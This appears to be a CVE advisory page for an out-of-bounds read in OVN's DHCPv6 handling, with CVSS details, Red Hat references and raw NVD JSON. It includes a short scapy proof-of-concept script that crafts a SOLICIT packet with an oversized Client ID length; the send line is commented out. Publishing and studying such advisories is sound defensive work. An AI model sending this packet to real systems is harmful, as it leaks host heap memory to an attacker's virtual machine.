CVE-2026-5367

Description

A flaw was found in OVN (Open Virtual Network). A remote attacker, by sending crafted DHCPv6 (Dynamic Host Configuration Protocol for IPv6) SOLICIT packets with an inflated Client ID length, could cause the ovn-controller to read beyond the bounds of a packet. This out-of-bounds read can lead to the disclosure of sensitive information stored in heap memory, which is then returned to the attacker's virtual machine port.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

具体受影响版本请参考Red Hat安全公告RHSA-2026:11694及后续相关公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

from scapy.all import *
from scapy.layers.inet6 import DHCP6_Solicit, DHCP6OptClientId, IPv6, UDP, Ether

# Target configuration
target_mac = "00:11:22:33:44:55"
src_mac = "aa:bb:cc:dd:ee:ff"

# Construct malicious DHCPv6 Solicit packet
# The vulnerability is triggered by an inflated Client ID length
malicious_client_id = DHCP6OptClientId(optlen=0xFFFF)

# Assemble the packet
pkt = Ether(src=src_mac, dst=target_mac) / \
      IPv6(src="::", dst="ff02::1:2") / \
      UDP(sport=546, dport=547) / \
      DHCP6_Solicit(trid=12345, options=[malicious_client_id])

# Send packet to trigger the out-of-bounds read
# sendp(pkt, iface="eth0")
print("[+] Malicious DHCPv6 packet generated for CVE-2026-5367")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5367
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5367
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5367/
[4] VulDB https://vuldb.com/cve/CVE-2026-5367
[5] https://access.redhat.com/errata/RHSA-2026:11694
[6] https://access.redhat.com/errata/RHSA-2026:11695
[7] https://access.redhat.com/errata/RHSA-2026:11696
[8] https://access.redhat.com/errata/RHSA-2026:11698
[9] https://access.redhat.com/errata/RHSA-2026:11700
[10] https://access.redhat.com/errata/RHSA-2026:11701
[11] https://access.redhat.com/errata/RHSA-2026:11702
[12] https://access.redhat.com/security/cve/CVE-2026-5367
[13] https://bugzilla.redhat.com/show_bug.cgi?id=2455863
[14] http://www.openwall.com/lists/oss-security/2026/04/20/3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5367", "sourceIdentifier": "[email protected]", "published": "2026-04-24T13:16:21.990", "lastModified": "2026-04-29T18:16:04.980", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in OVN (Open Virtual Network). A remote attacker, by sending crafted DHCPv6 (Dynamic Host Configuration Protocol for IPv6) SOLICIT packets with an inflated Client ID length, could cause the ovn-controller to read beyond the bounds of a packet. This out-of-bounds read can lead to the disclosure of sensitive information stored in heap memory, which is then returned to the attacker's virtual machine port."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-130"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:11694", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11695", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11696", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11698", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11700", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11701", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11702", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-5367", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455863", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/20/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/20/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}